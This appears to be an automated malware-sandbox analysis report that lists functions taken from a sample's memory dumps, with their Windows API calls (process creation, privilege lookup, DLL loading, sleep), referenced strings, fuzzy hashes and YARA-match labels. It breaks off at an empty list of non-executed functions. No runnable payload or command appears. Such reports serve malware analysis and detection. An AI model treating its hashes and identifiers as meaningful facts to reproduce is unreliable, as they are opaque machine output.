
Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 9d9310e3fdc0decbdf34f7eb15cffaa52909e5784c16c0b5b6e508642e3179eb
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 9AD012752402146BD710EF98CC45E97776DEF48750F154455FA185B241C530F90186E0

Uniqueness

Uniqueness Score: -1.00%

Function 050C9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C991A

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ec67edacd7f23cfd85c222c595358acbb1b442606788b2b99599e5ca8a6b992
Instruction ID: 9b51f5fefba68355e2ec59c9df385f204f7407f6a135cf5a984924e258b31af6
Opcode Fuzzy Hash: 6ec67edacd7f23cfd85c222c595358acbb1b442606788b2b99599e5ca8a6b992
Instruction Fuzzy Hash: 3B9002B224110902D1407159944474A411597D0341F91D011B5054554E86998DD576B5

Uniqueness

Uniqueness Score: -1.00%

Function 050C9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C954A

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 930bb6cee1b90e4c910465b0808d0900b53dc6669249154432865262e61f7cd9
Instruction ID: 4ed55de4e2566e70bc31f4ffcce9800d509186d4db4172c97685461e7b93386a
Opcode Fuzzy Hash: 930bb6cee1b90e4c910465b0808d0900b53dc6669249154432865262e61f7cd9
Instruction Fuzzy Hash: 16900477351105030105F55D574450F4157D7D53D17D1D031F1005550CD771CC717171

Uniqueness

Uniqueness Score: -1.00%

Function 050C99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C99AA

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a986afc90b57207ce3e66c9c78b13f085eb93239dcb6bdc07082e70ceb0f6441
Instruction ID: d269a879977a48dbe92d3a4c6c2463b17c0dc2070dfe90e422fd6e6e3eb9ccd4
Opcode Fuzzy Hash: a986afc90b57207ce3e66c9c78b13f085eb93239dcb6bdc07082e70ceb0f6441
Instruction Fuzzy Hash: 8C9002A238110942D10061599454B0A4115D7E1341F91D015F1054554D8659CC527176

Uniqueness

Uniqueness Score: -1.00%

Function 050C95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C95DA

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f438e516c1dd48bbaf3436d67c5f8ff63af31ff805b1041d99be8eee4b00649
Instruction ID: abcb0f738bdb1d6222b613d257f57ff32259515c49e7b42527c3fe3d62051fa5
Opcode Fuzzy Hash: 0f438e516c1dd48bbaf3436d67c5f8ff63af31ff805b1041d99be8eee4b00649
Instruction Fuzzy Hash: 729002A22421050341057159945461A811A97E0241F91D021F1004590DC56588917175

Uniqueness

Uniqueness Score: -1.00%

Function 050C9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C984A

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a9f652117bdfc156804b438aae6e42c4273ffcb823721c3bc951d8fe834c75e2
Instruction ID: 63356163c719addbf13fefad3fb2508700126c61c8f8db2f5855c7377c0654ce
Opcode Fuzzy Hash: a9f652117bdfc156804b438aae6e42c4273ffcb823721c3bc951d8fe834c75e2
Instruction Fuzzy Hash: A4900262282146525545B159944450B8116A7E0281BD1D012B1404950C85669856E671

Uniqueness

Uniqueness Score: -1.00%

Function 050C9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C986A

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a2fdbcf941097258f67734d2a8b1368c381501900f6ba15bcfd8618af0cb035f
Instruction ID: c990ff24b2fda2b63f623bb03397c9b4dbffbd2785f28e6ef20ea86b6cf6bb1e
Opcode Fuzzy Hash: a2fdbcf941097258f67734d2a8b1368c381501900f6ba15bcfd8618af0cb035f
Instruction Fuzzy Hash: F390027224110913D1116159954470B411997D0281FD1D412B0414558D96968952B171

Uniqueness

Uniqueness Score: -1.00%

Function 050C9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C971A

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 77808a9a0acce1188db9972ec075b9a57baa8cc75e782ebe4570deef1e8bbbc8
Instruction ID: f989b99c1788d38724efc6c97902f0bb78ff8894f6169b9fca508a3433f9e39d
Opcode Fuzzy Hash: 77808a9a0acce1188db9972ec075b9a57baa8cc75e782ebe4570deef1e8bbbc8
Instruction Fuzzy Hash: 4490027224110902D1006599A44864A411597E0341F91E011B5014555EC6A588917171

Uniqueness

Uniqueness Score: -1.00%

Function 050C9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C978A

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2535c85de7133c8da5aa1f1f5bbb7480d7074caac6f2cbb5fac827cef8f461ba
Instruction ID: eb7a4dfbf64d8e1514e3b997a98fa3e5c1f037bd7346a3eeaec1281db84a8ef3
Opcode Fuzzy Hash: 2535c85de7133c8da5aa1f1f5bbb7480d7074caac6f2cbb5fac827cef8f461ba
Instruction Fuzzy Hash: B490026A25310502D1807159A44860E411597D1242FD1E415B0005558CC95588696371

Uniqueness

Uniqueness Score: -1.00%

Function 050C9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C9FEA

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a241cd350b8e172fd38834424f4eeff1d6be7a224c10ad5d377253a01e5c6a28
Instruction ID: 4fa4ece528165c115a19d6db7fe4118b4b706d5d5799078bf0f992670ee2342d
Opcode Fuzzy Hash: a241cd350b8e172fd38834424f4eeff1d6be7a224c10ad5d377253a01e5c6a28
Instruction Fuzzy Hash: 5C90027235124902D1106159D44470A411597D1241F91D411B0814558D86D588917172

Uniqueness

Uniqueness Score: -1.00%

Function 050C9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C965A

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0d499ea1ea26eb6354930d297d657f8d9beba767cd8884f6e27a83bcc8edeece
Instruction ID: f62f6535ab867ea73fcfd894175616f69d2f8b4ce940b77ef2de4788faac70f5
Opcode Fuzzy Hash: 0d499ea1ea26eb6354930d297d657f8d9beba767cd8884f6e27a83bcc8edeece
Instruction Fuzzy Hash: 5B90027224514D42D14071599444A4A412597D0345F91D011B0054694D96658D55B6B1

Uniqueness

Uniqueness Score: -1.00%

Function 050C9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C9A5A

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6ff2758363da8587c5f84b91fe680ca8eafe70956b6f3c1198c9775493e220c
Instruction ID: a5c734553dbac5637c7c0e894163a382b751f6cf6d018723075e4f0718f996e6
Opcode Fuzzy Hash: b6ff2758363da8587c5f84b91fe680ca8eafe70956b6f3c1198c9775493e220c
Instruction Fuzzy Hash: 7690026225190542D20065699C54B0B411597D0343F91D115B0144554CC95588616571

Uniqueness

Uniqueness Score: -1.00%

Function 050C9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C966A

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee25fa6caece8c95cc7555180ad94f8a023e85c38989c317bbadca6707ee1ba5
Instruction ID: 0b6463386a4a1af0f815bc8acaa03d4c2bccb0fb1acd73bc399a8a6baaec8d46
Opcode Fuzzy Hash: ee25fa6caece8c95cc7555180ad94f8a023e85c38989c317bbadca6707ee1ba5
Instruction Fuzzy Hash: 3890027224110D02D1807159944464E411597D1341FD1D015B0015654DCA558A5977F1

Uniqueness

Uniqueness Score: -1.00%

Function 050C96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C96DA

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c3e385dd19e1d84e40b0c8dd410b9919491b4770cfbf5284fa6f6b1bc42ed9e7
Instruction ID: 8506af557483d4cf1a4651772ce1ccd300dca49e8bdede49b449c5c08f6266d3
Opcode Fuzzy Hash: c3e385dd19e1d84e40b0c8dd410b9919491b4770cfbf5284fa6f6b1bc42ed9e7
Instruction Fuzzy Hash: 0C90027224110D42D10061599444B4A411597E0341F91D016B0114654D8655C8517571

Uniqueness

Uniqueness Score: -1.00%

Function 050C96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C96EA

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31c89a4aa8e32ade0a58afddcb598e13c069314e390f69d20d8708296cdd3e7f
Instruction ID: a7c7ea160c74ce98e8401523685e7b23a17e49d37c343c7f76255840d83275b9
Opcode Fuzzy Hash: 31c89a4aa8e32ade0a58afddcb598e13c069314e390f69d20d8708296cdd3e7f
Instruction Fuzzy Hash: 5B90027224118D02D1106159D44474E411597D0341F95D411B4414658D86D588917171

Uniqueness

Uniqueness Score: -1.00%

Function 02ED6EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02ED6F88

Strings

wininet.dll, xrefs: 02ED6F3E, 02ED6F47
net.dll, xrefs: 02ED6F51, 02ED6FD7, 02ED6FAF, 02ED6FBB, 02ED6FE3

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 47cb8c1c14608f463c3d5ddb211abf0544ada0c9bba08c212f5591c4767bbdef
Instruction ID: 22132fc6208a39ab016d8c86e5d78fe7fc68062afb289001d73bb7ed3777809b
Opcode Fuzzy Hash: 47cb8c1c14608f463c3d5ddb211abf0544ada0c9bba08c212f5591c4767bbdef
Instruction Fuzzy Hash: C73190B1641704ABC715DF69D8A0FA7B7B9EF48704F00841DF61A9B241D770A446CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02ED6ED6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02ED6F88

Strings

wininet.dll, xrefs: 02ED6F3E, 02ED6F47
net.dll, xrefs: 02ED6F51, 02ED6FAF, 02ED6FBB

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 304a8ac1f6ba0100a2cf80d4cc6bd05d16c977ba49d1236e3e197c22bafc78e9
Instruction ID: 6ddf0bb5451b4f8f28f88c369c212048824c2af1cdaf8223c6131096bea31fc8
Opcode Fuzzy Hash: 304a8ac1f6ba0100a2cf80d4cc6bd05d16c977ba49d1236e3e197c22bafc78e9
Instruction Fuzzy Hash: 9331BDB1681700ABC720DF69D8A0FABBBB9EF48304F04D46DF6199B241D770A546CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02ED84C4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02EC3B93), ref: 02ED84FD

Strings

.z`, xrefs: 02ED84EC, 02ED84F8

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: cbff2e7dfee394080fa029acc7c96655ed9005df4416436bf87e9e694d432e8f
Instruction ID: fe5941ae5c91363b10e13b24d70bcfb4d0523f08c57baf55e0b37484fd6c6fd1
Opcode Fuzzy Hash: cbff2e7dfee394080fa029acc7c96655ed9005df4416436bf87e9e694d432e8f
Instruction Fuzzy Hash: 35E06DB1600614AFDB15DF54CC44EE7BBE9EF88350F05896DF94C9B291C631E911CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 02ED84D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02EC3B93), ref: 02ED84FD

Strings

.z`, xrefs: 02ED84EC, 02ED84F8

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 1ad325cece17e4b7d440302d4ba14ca6f9eccf82300f6ff1d2bfe17423f4802d
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 31E046B1200208ABDB18EF99CC48EA777ADEF88750F018558FE085B281CA31F911CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02EC7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02EC72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02EC72DB

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction ID: 706007f281a07b547cb6440f9a81672d18155bc7c988b758b7f500a1c404b7e4
Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction Fuzzy Hash: 7401A271AC032876E724A6D49D02FFFB76C9B40B51F158119FF08BA1C1E6946A078BF6

Uniqueness

Uniqueness Score: -1.00%

Function 02EC9B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02EC9B92

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: f2ce5928c55ed2d5ebb5fb46bcca8c69bbe98758011f73e46ed057bc8dfe9f17
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EA0121B6D4020DBBDF10EBE4DD51FADB7B99B44308F1081A9E90897241F631EB15CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02ED8540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02ED8594

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 2db545d719acccc99674d8a29dcc76d608ecb87b3415c124818318c6e6807381
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: F7015FB2214108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97251D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02ED853D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02ED8594

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 92f9c071b1ac1446f3f3aa5810b6a4b42e0fc9f1713079369d7b6f92d8671325
Instruction ID: f39839758257b27b18e6ba96fcc1d8703f1b2003a556b23b032b3068cb80fb3c
Opcode Fuzzy Hash: 92f9c071b1ac1446f3f3aa5810b6a4b42e0fc9f1713079369d7b6f92d8671325
Instruction Fuzzy Hash: 5101AFB2214108AFCB54CF89DC80EEB37AEAF8C354F158658FA0DD7250C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02ED7010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02ECCCD0,?,?), ref: 02ED704C

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
Instruction ID: d6c83225f61243b304e437ad4776bdd4d7fd5b031c956684e92f6fd8c1d33934
Opcode Fuzzy Hash: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
Instruction Fuzzy Hash: 08E092333D03043AE33066A99C02FA7B39DCB81B25F544026FB0DEB2C0D595F80246A5

Uniqueness

Uniqueness Score: -1.00%

Function 02ED8665, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02ECCFA2,02ECCFA2,?,00000000,?,?), ref: 02ED8660

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 158f38d3ab02ea7ef7f4553521ef39f7531357e07ba465e3cf2d06eedb73571f
Instruction ID: 012cb4171cc9a6d79fde85bb799c391dcaa00cea5766c5bdb90e96392ef3450d
Opcode Fuzzy Hash: 158f38d3ab02ea7ef7f4553521ef39f7531357e07ba465e3cf2d06eedb73571f
Instruction Fuzzy Hash: ACF0A7B53402046BE724DF55CC45EEB77AEEF85710F06C454FD4817241D931A802CAF4

Uniqueness

Uniqueness Score: -1.00%

Function 02ED862B, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02ECCFA2,02ECCFA2,?,00000000,?,?), ref: 02ED8660

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: ce1f9525ecd21d0ec0ce4af65b0319fcfed53a98bf9e99751e8154ce3821e14f
Instruction ID: 9ece2fa549f03cf8bc95db178d5e21ffb2c865c253e39706c94b591a910737ff
Opcode Fuzzy Hash: ce1f9525ecd21d0ec0ce4af65b0319fcfed53a98bf9e99751e8154ce3821e14f
Instruction Fuzzy Hash: 78E01AB52402196BDB24DF49CC84EEB37AEEF89650F018564FE0C5B281CA31E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02ED8630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02ECCFA2,02ECCFA2,?,00000000,?,?), ref: 02ED8660

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: cdd0a0b8c5183839361f52adfeb41cc820ae2fb13cc85af850d7238ffc5d737f
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: E0E01AB12002086BDB10DF49CC84EE737ADAF89650F018554FA0857241C931E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02ED8490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02ED3516,?,02ED3C8F,02ED3C8F,?,02ED3516,?,?,?,?,?,00000000,00000000,?), ref: 02ED84BD

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 098cabe28542312cd38fa15be6f1391da7f1b4b6289944342f5edb9284c8a013
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 72E046B1200208ABDB14EF99CC40EA777ADEF88750F118558FE085B281CA31F911CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 02ECD407, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02EC7C63,?), ref: 02ECD43B

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: fdc13585e5b15512de4f9e0bdc10c44ae20f213bd79eeb8d59cc0d6b003cba53
Instruction ID: 4f95fa49d33ea5a02d6f3299638de9dd62b5c227474aa8cb68a7f79730e44ce7
Opcode Fuzzy Hash: fdc13585e5b15512de4f9e0bdc10c44ae20f213bd79eeb8d59cc0d6b003cba53
Instruction Fuzzy Hash: E4E0C2756802053AEA24AFB49C06FA92254AB64304F1980A8F94AE72C3DA20D0028950

Uniqueness

Uniqueness Score: -1.00%

Function 02ECD410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02EC7C63,?), ref: 02ECD43B

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: a77f0de7ba8806817356e39ca69d76a862f39012a98525c63a8fd402fbfb7348
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 9CD05E657903043AE610ABA89C02F267289AB54A04F498064FA49963C3DA60E4014961

Uniqueness

Uniqueness Score: -1.00%

Function 050C967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C9694

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f1ea0fa6f96383b85d6a676d0c8def434cd2c9b1962f0ebd61cb2ec2d12274e
Instruction ID: c7b0b873eea8eb2ebff3a3449345afc29b3e8d72d39b493e4dbcb53b3154fef0
Opcode Fuzzy Hash: 6f1ea0fa6f96383b85d6a676d0c8def434cd2c9b1962f0ebd61cb2ec2d12274e
Instruction Fuzzy Hash: 17B02B728010C5C5D600D3605608B2F7E0077C0300F12C051E1020244A0338C090F2B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0513B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

